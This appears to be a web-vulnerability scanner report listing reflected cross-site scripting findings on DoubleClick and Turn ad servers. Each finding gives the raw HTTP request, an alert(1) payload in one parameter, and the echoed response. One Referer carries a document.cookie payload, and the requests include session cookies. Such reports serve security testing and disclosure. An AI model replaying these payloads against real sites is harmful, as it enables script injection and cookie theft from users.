Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 37225
Cache-Control: no-cache
Pragma: no-cache
Date: Thu, 10 Mar 2011 16:45:41 GMT
Expires: Thu, 10 Mar 2011 16:45:41 GMT
The value of the adurl request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cd8f9"-alert(1)-"daf8fe6749e was submitted in the adurl parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adi/N5295.134426.GOOGLEDISPLAYNETWOR/B5081081.19;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BAENoyPd4TZ7sN9X0lAeTivDnB_GQ74ECga7P3B7AjbcBwJyyARABGAEgvs7lDTgAUMTE0OECYMnm9obIo6AZoAHXsf3cA7oBCTcyOHg5MF9hc8gBCdoBOmZpbGU6Ly8vQzovY2RuL2V4YW1wbGVzL1NNXzcuMi4zOTI1X0ZpbGUyX0J1cnBfMS4zLjA4Lmh0bWy4AhioAwHRA6UdSeRjy2TM6ANs6APUB-gDwQfoA9UF9QMCAADE&num=1&sig=AGiWqtzNnBgIlsjs7mSmiiLAu_ySFar1ug&client=ca-pub-4063878933780912&adurl=cd8f9"-alert(1)-"daf8fe6749e HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1299795013&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2FSM_7.2.3925_File2_Burp_1.3.08.html&dt=1299773413750&shv=r20101117&jsv=r20110307&saldr=1&correlator=1299773413772&frm=0&adk=1607234649&ga_vid=2011621435.1299773414&ga_sid=1299773414&ga_hid=15489387&ga_fc=0&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1075&bih=949&fu=0&ifi=1&dtd=54&xpc=XwwY3tlWp2&p=file%3A//
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7019
Cache-Control: no-cache
Pragma: no-cache
Date: Thu, 10 Mar 2011 16:45:40 GMT
Expires: Thu, 10 Mar 2011 16:45:40 GMT
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... 8vQzovY2RuL2V4YW1wbGVzL1NNXzcuMi4zOTI1X0ZpbGUyX0J1cnBfMS4zLjA4Lmh0bWy4AhioAwHRA6UdSeRjy2TM6ANs6APUB-gDwQfoA9UF9QMCAADE&num=1&sig=AGiWqtzNnBgIlsjs7mSmiiLAu_ySFar1ug&client=ca-pub-4063878933780912&adurl=cd8f9"-alert(1)-"daf8fe6749ehttp://ad.doubleclick.net/2493053/redirect_nexuss_gdn.html"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ""; var dcallowscriptaccess = "never";
The value of the ai request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9509f"-alert(1)-"6749c3c0d7d was submitted in the ai parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adi/N5295.134426.GOOGLEDISPLAYNETWOR/B5081081.19;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BAENoyPd4TZ7sN9X0lAeTivDnB_GQ74ECga7P3B7AjbcBwJyyARABGAEgvs7lDTgAUMTE0OECYMnm9obIo6AZoAHXsf3cA7oBCTcyOHg5MF9hc8gBCdoBOmZpbGU6Ly8vQzovY2RuL2V4YW1wbGVzL1NNXzcuMi4zOTI1X0ZpbGUyX0J1cnBfMS4zLjA4Lmh0bWy4AhioAwHRA6UdSeRjy2TM6ANs6APUB-gDwQfoA9UF9QMCAADE9509f"-alert(1)-"6749c3c0d7d&num=1&sig=AGiWqtzNnBgIlsjs7mSmiiLAu_ySFar1ug&client=ca-pub-4063878933780912&adurl=;ord=1648973795? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1299795013&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2FSM_7.2.3925_File2_Burp_1.3.08.html&dt=1299773413750&shv=r20101117&jsv=r20110307&saldr=1&correlator=1299773413772&frm=0&adk=1607234649&ga_vid=2011621435.1299773414&ga_sid=1299773414&ga_hid=15489387&ga_fc=0&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1075&bih=949&fu=0&ifi=1&dtd=54&xpc=XwwY3tlWp2&p=file%3A//
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Thu, 10 Mar 2011 16:44:23 GMT
Vary: Accept-Encoding
Expires: Thu, 10 Mar 2011 16:44:23 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7041
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... BwJyyARABGAEgvs7lDTgAUMTE0OECYMnm9obIo6AZoAHXsf3cA7oBCTcyOHg5MF9hc8gBCdoBOmZpbGU6Ly8vQzovY2RuL2V4YW1wbGVzL1NNXzcuMi4zOTI1X0ZpbGUyX0J1cnBfMS4zLjA4Lmh0bWy4AhioAwHRA6UdSeRjy2TM6ANs6APUB-gDwQfoA9UF9QMCAADE9509f"-alert(1)-"6749c3c0d7d&num=1&sig=AGiWqtzNnBgIlsjs7mSmiiLAu_ySFar1ug&client=ca-pub-4063878933780912&adurl=http%3a%2f%2fad.doubleclick.net/2493053/redirect_nexuss_gdn.html"); var fscUrl = url; var fscUrlClickTagFound = fals ...[SNIP]...
The value of the client request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1e2c8"-alert(1)-"1f32606eed2 was submitted in the client parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adi/N5295.134426.GOOGLEDISPLAYNETWOR/B5081081.19;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BAENoyPd4TZ7sN9X0lAeTivDnB_GQ74ECga7P3B7AjbcBwJyyARABGAEgvs7lDTgAUMTE0OECYMnm9obIo6AZoAHXsf3cA7oBCTcyOHg5MF9hc8gBCdoBOmZpbGU6Ly8vQzovY2RuL2V4YW1wbGVzL1NNXzcuMi4zOTI1X0ZpbGUyX0J1cnBfMS4zLjA4Lmh0bWy4AhioAwHRA6UdSeRjy2TM6ANs6APUB-gDwQfoA9UF9QMCAADE&num=1&sig=AGiWqtzNnBgIlsjs7mSmiiLAu_ySFar1ug&client=ca-pub-40638789337809121e2c8"-alert(1)-"1f32606eed2&adurl=;ord=1648973795? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1299795013&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2FSM_7.2.3925_File2_Burp_1.3.08.html&dt=1299773413750&shv=r20101117&jsv=r20110307&saldr=1&correlator=1299773413772&frm=0&adk=1607234649&ga_vid=2011621435.1299773414&ga_sid=1299773414&ga_hid=15489387&ga_fc=0&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1075&bih=949&fu=0&ifi=1&dtd=54&xpc=XwwY3tlWp2&p=file%3A//
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Thu, 10 Mar 2011 16:45:26 GMT
Vary: Accept-Encoding
Expires: Thu, 10 Mar 2011 16:45:26 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 37216
The value of the num request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 29875"-alert(1)-"c5c47c97bbe was submitted in the num parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adi/N5295.134426.GOOGLEDISPLAYNETWOR/B5081081.19;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BAENoyPd4TZ7sN9X0lAeTivDnB_GQ74ECga7P3B7AjbcBwJyyARABGAEgvs7lDTgAUMTE0OECYMnm9obIo6AZoAHXsf3cA7oBCTcyOHg5MF9hc8gBCdoBOmZpbGU6Ly8vQzovY2RuL2V4YW1wbGVzL1NNXzcuMi4zOTI1X0ZpbGUyX0J1cnBfMS4zLjA4Lmh0bWy4AhioAwHRA6UdSeRjy2TM6ANs6APUB-gDwQfoA9UF9QMCAADE&num=129875"-alert(1)-"c5c47c97bbe&sig=AGiWqtzNnBgIlsjs7mSmiiLAu_ySFar1ug&client=ca-pub-4063878933780912&adurl=;ord=1648973795? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1299795013&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2FSM_7.2.3925_File2_Burp_1.3.08.html&dt=1299773413750&shv=r20101117&jsv=r20110307&saldr=1&correlator=1299773413772&frm=0&adk=1607234649&ga_vid=2011621435.1299773414&ga_sid=1299773414&ga_hid=15489387&ga_fc=0&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1075&bih=949&fu=0&ifi=1&dtd=54&xpc=XwwY3tlWp2&p=file%3A//
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Thu, 10 Mar 2011 16:44:44 GMT
Vary: Accept-Encoding
Expires: Thu, 10 Mar 2011 16:44:44 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7041
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... RABGAEgvs7lDTgAUMTE0OECYMnm9obIo6AZoAHXsf3cA7oBCTcyOHg5MF9hc8gBCdoBOmZpbGU6Ly8vQzovY2RuL2V4YW1wbGVzL1NNXzcuMi4zOTI1X0ZpbGUyX0J1cnBfMS4zLjA4Lmh0bWy4AhioAwHRA6UdSeRjy2TM6ANs6APUB-gDwQfoA9UF9QMCAADE&num=129875"-alert(1)-"c5c47c97bbe&sig=AGiWqtzNnBgIlsjs7mSmiiLAu_ySFar1ug&client=ca-pub-4063878933780912&adurl=http%3a%2f%2fad.doubleclick.net/2493053/redirect_nexuss_gdn.html"); var fscUrl = url; var fscUrlClickTagFound = false; va ...[SNIP]...
The value of the sig request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ebe5e"-alert(1)-"7b2a3fedccd was submitted in the sig parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adi/N5295.134426.GOOGLEDISPLAYNETWOR/B5081081.19;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BAENoyPd4TZ7sN9X0lAeTivDnB_GQ74ECga7P3B7AjbcBwJyyARABGAEgvs7lDTgAUMTE0OECYMnm9obIo6AZoAHXsf3cA7oBCTcyOHg5MF9hc8gBCdoBOmZpbGU6Ly8vQzovY2RuL2V4YW1wbGVzL1NNXzcuMi4zOTI1X0ZpbGUyX0J1cnBfMS4zLjA4Lmh0bWy4AhioAwHRA6UdSeRjy2TM6ANs6APUB-gDwQfoA9UF9QMCAADE&num=1&sig=AGiWqtzNnBgIlsjs7mSmiiLAu_ySFar1ugebe5e"-alert(1)-"7b2a3fedccd&client=ca-pub-4063878933780912&adurl=;ord=1648973795? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1299795013&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2FSM_7.2.3925_File2_Burp_1.3.08.html&dt=1299773413750&shv=r20101117&jsv=r20110307&saldr=1&correlator=1299773413772&frm=0&adk=1607234649&ga_vid=2011621435.1299773414&ga_sid=1299773414&ga_hid=15489387&ga_fc=0&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1075&bih=949&fu=0&ifi=1&dtd=54&xpc=XwwY3tlWp2&p=file%3A//
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Thu, 10 Mar 2011 16:45:05 GMT
Vary: Accept-Encoding
Expires: Thu, 10 Mar 2011 16:45:05 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7037
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... sf3cA7oBCTcyOHg5MF9hc8gBCdoBOmZpbGU6Ly8vQzovY2RuL2V4YW1wbGVzL1NNXzcuMi4zOTI1X0ZpbGUyX0J1cnBfMS4zLjA4Lmh0bWy4AhioAwHRA6UdSeRjy2TM6ANs6APUB-gDwQfoA9UF9QMCAADE&num=1&sig=AGiWqtzNnBgIlsjs7mSmiiLAu_ySFar1ugebe5e"-alert(1)-"7b2a3fedccd&client=ca-pub-4063878933780912&adurl=http%3a%2f%2fad.doubleclick.net/2493053/redirect_nexuss_gdn.html"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ""; var ...[SNIP]...
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b7470"-alert(1)-"05fd012cf34 was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adi/N5295.134426.GOOGLEDISPLAYNETWOR/B5081081.19;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=lb7470"-alert(1)-"05fd012cf34&ai=BAENoyPd4TZ7sN9X0lAeTivDnB_GQ74ECga7P3B7AjbcBwJyyARABGAEgvs7lDTgAUMTE0OECYMnm9obIo6AZoAHXsf3cA7oBCTcyOHg5MF9hc8gBCdoBOmZpbGU6Ly8vQzovY2RuL2V4YW1wbGVzL1NNXzcuMi4zOTI1X0ZpbGUyX0J1cnBfMS4zLjA4Lmh0bWy4AhioAwHRA6UdSeRjy2TM6ANs6APUB-gDwQfoA9UF9QMCAADE&num=1&sig=AGiWqtzNnBgIlsjs7mSmiiLAu_ySFar1ug&client=ca-pub-4063878933780912&adurl=;ord=1648973795? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1299795013&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2FSM_7.2.3925_File2_Burp_1.3.08.html&dt=1299773413750&shv=r20101117&jsv=r20110307&saldr=1&correlator=1299773413772&frm=0&adk=1607234649&ga_vid=2011621435.1299773414&ga_sid=1299773414&ga_hid=15489387&ga_fc=0&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1075&bih=949&fu=0&ifi=1&dtd=54&xpc=XwwY3tlWp2&p=file%3A//
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Thu, 10 Mar 2011 16:44:13 GMT
Vary: Accept-Encoding
Expires: Thu, 10 Mar 2011 16:44:13 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7037
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... l = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3ac6/f/194/%2a/e%3B235864053%3B1-0%3B0%3B59652986%3B3454-728/90%3B39730864/39748651/1%3B%3B%7Esscs%3D%3fhttp://googleads.g.doubleclick.net/aclk?sa=lb7470"-alert(1)-"05fd012cf34&ai=BAENoyPd4TZ7sN9X0lAeTivDnB_GQ74ECga7P3B7AjbcBwJyyARABGAEgvs7lDTgAUMTE0OECYMnm9obIo6AZoAHXsf3cA7oBCTcyOHg5MF9hc8gBCdoBOmZpbGU6Ly8vQzovY2RuL2V4YW1wbGVzL1NNXzcuMi4zOTI1X0ZpbGUyX0J1cnBfMS4zLjA4Lmh0bWy4 ...[SNIP]...
The value of the fpid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload de360"><script>alert(1)</script>924b327da15 was submitted in the fpid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /server/pixel.htm?fpid=de360"><script>alert(1)</script>924b327da15 HTTP/1.1 Host: ad.turn.com Proxy-Connection: keep-alive Referer: http://www.runnersworld.com/community/persona/index.jsp?UID=8381023245&plckPersonaPage=BlogViewPost&plckUserId=8381023245&plckPostId=Blog%3a8381023245Post%3abb649e12-3868-43dd-b515-23f9a69f8636&plckController=PersonaBlog&plckScript=personaScript&plckElementId=personaDest\6b663%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E8d424413273 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: adImpCount=gBDNuKNyKsl9Odgd8wAsQTKysbuTZf2s5M5FD_CAAB7DlGIUOWYS4TNj-1gj_Xcu6CYQDDQa1VL94yX_MoGpV_GUt1ksyvX1In61OuSwLt10u9X24kO-JCULGTAtCiI82oACfqCIYQ-ERdvzbQ_bSmzG5dlloET5SP593yLAYUYzCAmv0Bkl4LE-5xiOhqqU5hzUx6VAO2k6m2QQxK9K08oG9BkcazYcP_2TrcEOQP3WiKBAOiVD6755T8m0f3BSo_YLr4EKIQlY-CdWF8ITS28_IvRz2JEsIjhRKl0lPa2LXPx_rEG03BIJwC5BX6NRjN1OhEClvNCotpoUoTVc7xvpANZVmAjLpguK-shoxo4dbNA6MY7kRMgbXMy-D477nELWUQ0Rw535KLqcq4q__J8WOoC21eSuP4JNkyvRABQFijVgU7PXn0jHxkPCNv4bOyUPC9Fpm7etzgvO_fmrPkooj63m4sjCGxUC0pM2SLiq9bBec_QkIP-JoLdM2w1VhZ21JrK1wBbfUDbEfzxZmaJD4c5aSaK33YzyKwwYBCqCQPyKSyeLLFNGI5yEMkfIKVPRVzGG23OkJv5AMKUTaqg_u8mtM46FV1h3QfJdTZWUFE9U6EKcwdjYdcVNUkvIeogMyqtOxBjt39bKPXzgmmxBsnrLbTgBzBVNImszQJKvw9LgipyjPoHCcfZrpUai4JLuayTba8oiNq_XhSPmwx5GmgUQyfnbOd2w3kmx8qvNHk6KDzwAPsyOISbfg6MfRpzV7LM6J13WDlxXaw0dwtaogoecLkh5Gdwzns6PR3AwgCiTm-xPyon8eQDhlKvugIXAKcMPhEbqI-V9Sv3eooMsNg36di6E49Nomd6jTU9egCSRMS98UFVNYjVtQ4urBK3FjPWZ3Di0FOD2Kcxr-k0OB82HjViKXqLuoMNTyWQcXhNTrz3mr8sow7iQNpitGHAyXWEYyGBykEoLQhmrWNoPJC71oS0hJqlJnrpnGFhJzhvWSyFYd2BWpLKYJlg6-W5HTVi_oOco4RQh7z9_-JaW43Pz5VN0dvHJoxbNVZ97tpG9XttSdPWXi0z6Jg6IsnTvMmWWDNqbkX3hH8mhIYBK7MGRBOeR1YzcCeyMpDmJ0VuAHXPcV73Qns4O__Jj2lJ6Z
KhH3VM3BvZ2PJZeyo_K_w_o-V6MIHko5ImHHJbecjI5VdlIWmt54cjQRcHYMQPwiCOVkrMyS-0aX55fmlk35l0spUAw8t8ZqIkxNj8MPYazz3rO03ATWFwaY5i7iStqAsWbZ7YUH8GSY7-t_J4r25-aiikPN2qEVv7TRiqUvlZaM8XFIBijkSFeg2zGD4fdRlNM5LTzq4xWE1ZK--LAz8MzOM-C6CDT3q-ifKpEezhVQTYte5F3-FeYiKlQRaZz7xWCD_yX14N-tT3hfO0kAXszpV0W1GkBMMS3Gw0HTCum57pWAGCiPcC_Z3qGFfLVq6mopJGWBFdzU_rmPxWIBEzIt_I5ABOElN7-o1N0L93nQNnHmE-8Xu8-ECY9xLe3lcSfWb-KhRGhyVysbsZk7iyEoz8zA3JQ2C9OfjxiW2aYr0a3K5tIEMzcXQPpur3bq3Thm6_2RS_S2g9W_7fY1zc1K0WPlL98x7sL6KENQXMr7tOj0tStdl9JeUiMHFtb__DUdwj-uP98hpbTt4roaMGQuQnD9agQHp-xH4Jafs6FBmb98eQD_cOP3DvEMi6XhBSdavl4LR2MIjmTF0mh_AG_jc7gjylPqQCeipADH7ZUYz5xSIAGz8ZVdz_gI_tGwcmLB8JEgvxf4yceK-ytsejiDtfYk-vq9YFwucMhc7pp4fbrfTAG1AhqWCVhGwlgeOqlB-BkyxJ1zDSGE0snnnxI1S7YTiuj-fGScF4oQVIZccBuiROOGCDUYKGlYL_kqGR8obvHHZk267UOKXgsCO18tJuj14RjnfWV9JCCZksmnBPhOpWQIIbDrQeMFzQrFDQzzgYAL9AjXWyagDxRnYrN-9pjuSYDN0EVr-A1pVfxWPrW29xmD_ZeGx-AE82rXSYVcjz2J0squiYwC1lSTDghv5hxN42WTZrbBPUWmCi_6M18neu_Vazros1bDD1RMNP69o628EHNgUTgy0PfHqtb-SYVZWNt6hO30_te5Eiua7R-LT6r8oudwmlo4u1rDUlsabP08_i0966mykYBmvFZvHLkAa30wkjTumfXaFDIfbonZq657eoULxrE0KDvfmac-lNvjOsoiUlf13KH2StPZs3JjeWcrw3FmAmZ_RtseJ6xozjuP7ZdQwIEpp8nLCbAQOxgA2x5FvD72qZzxdn2BHj2pHFYtOY7bzwWmWsNvLyU_XSNqO1BDG83X80DgytqEg90YRZxOOi-Q0rmjkPfMOEIgGA-K9y-Zc4tR7KRJlpJ4PlVYxVaMvB1wYPNMfFs382zN0o7uzcPmdNK1_b3Ua6Vc0GyYGzFgDpNxONxibEN5pV6-d_sBzVLRBMFYCWf6caSG4LvO5wFQK5rWe8X_fTtzfSXBh6egF0Rwa3OCNWzkU-61-zDsHD8uqSEGm_zHYk1Lx3D3zdxfoViaQ2DOWdSRXMqAXHjE1bj46PH61xKbR-SCeq4p4CAvfxI-56aT45lrDgMry2PNxuYVt3awaDu13VvFwpGzs06VQoe4DVxSHVvfrsSQMYWsxPY7alAyM08Y81chhsaFrvpqC9YhigzHku7t4ADij4Bw7EVtWzromyqquGZ7KVTTEQszed-lC1fMtCjU1z2xJ1CnZG4LQk8JxaWG0f85jA_1_EgfGzLymJqXqxDkl_z6MLzU6M9nX4-GUSLU2nvHNtoJlouXD8ZYi9DnZrOv6fUoZGFDgLSYVRUaQ-Wqmj3Tei_CdEkIQzkhmYyekerLrx9FrOtoxmBIEIaEp5KqP8jd88N4SLrpWX75qPcPWilpSsIABAYe0PnXbtU01VUbzTE76SN2br5p6VEXJlHEcVqa7s7pI24wvVlZWelsG_swcmrkZNllXiyt69BIY5KH70UEviYerZeVNNKkpbsXiR6Sun3kKaXxA7raRqYLrVBWPKJ4cYHaESEng8GxJ7c7_83qI2KkIKG8gPGwoFkVm7IMVTuQueBCC8E-DRc1jh5bznh7BOOaG3LFaFrDxbQg
